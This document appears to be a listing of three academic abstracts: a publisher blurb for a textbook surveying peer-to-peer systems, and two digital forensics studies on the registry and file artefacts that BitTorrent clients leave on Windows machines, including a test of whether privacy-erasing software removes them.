Starting with Napster and Gnutella, peer-to-peer systems became an integrated part of the Internet fabric attracting millions of users. According to recent evaluations, peer-to-peer traffic now exceeds Web traffic, once the dominant traffic on the Internet. While the most popular peer-to-peer applications remain file sharing and content distribution, new applications such as Internet telephony are emerging. Within just a few years, the huge popularity of peer-to-peer systems and the explosion of peer-to-peer research have created a large body of knowledge, but this book is the first textbook-like survey to provide an up-to-date and in-depth introduction to the field. This state-of-the-art survey systematically draws together prerequisites from various fields, presents techniques and methodologies in a principled and coherent way, and gives a comprehensive overview on the manifold applications of the peer-to-peer paradigm. Leading researchers contributed their expert knowledge to this book, each in his/her own specific area. Lecturers can choose from the wide range of 32 tightly integrated chapters on all current aspects of P2P systems and applications, and thus individually tailor their class syllabi. R&D professionals active in P2P will appreciate this book as a valuable source of reference and inspiration.
Article
Internet file sharing via the use of peer-to-peer networks is an activity that has been growing steadily for several years. It has rapidly become the most widespread method for the exchange of digital material and as a result raises much controversy. The current, most popular protocol in this field is BitTorrent. Although it is relatively simple in most cases to link particular file sharing activities to an IP address, this does little to prove that a particular user was responsible for using the connection. This study explores three popular BitTorrent client applications, BitComet, Vuze and μTorrent and outlines the registry artefacts that are produced by the installation and use of these programs on a Windows 7 client. These artefacts are examined in detail to establish what useful evidence, if any, can be recovered from them. Relevant information is highlighted for each application.
Article
The aim of this study was to identify forensic artefacts produced by BitTorrent file sharing, and specifically, to establish if the artefacts could lead to identification of the files downloaded or the files shared. A further objective was to identify any artefacts that could determine IP addresses of remote computers from which data was downloaded, or shared, during the test phase. The final aim was to test whether automated erasing software would delete the BitTorrent artefacts identified. The BitTorrent clients BitComet, uTorrent, Azureus, ABC, and BitTornado were chosen to test as these were determined to be the most "popular" at the time of this study. Each client was analysed with forensic software on generated image files and also in situ. The analysis demonstrated that it was possible to identify files that were currently being downloaded and files currently being shared. It was also possible to identify the amount of data that had been exchanged i.e. uploaded or downloaded for specific files. Some clients produced artefacts that revealed a complete record of the torrent files that had been downloaded and shared. Analysis also revealed that some clients stored the Internet Protocol (IP) addresses of remote computers, with which they had connected when downloading or sharing specific files. The detail and forensic quality of information identified, varied between the clients tested. Finally the Cyberscrub Privicy Suite software (version 4.5) was found to successfully delete (beyond recovery) most of the BitTorrent artefacts identified. The program is designed to specifically delete "sensitive" information produced by the clients: BitComet, uTorrent and Azureus.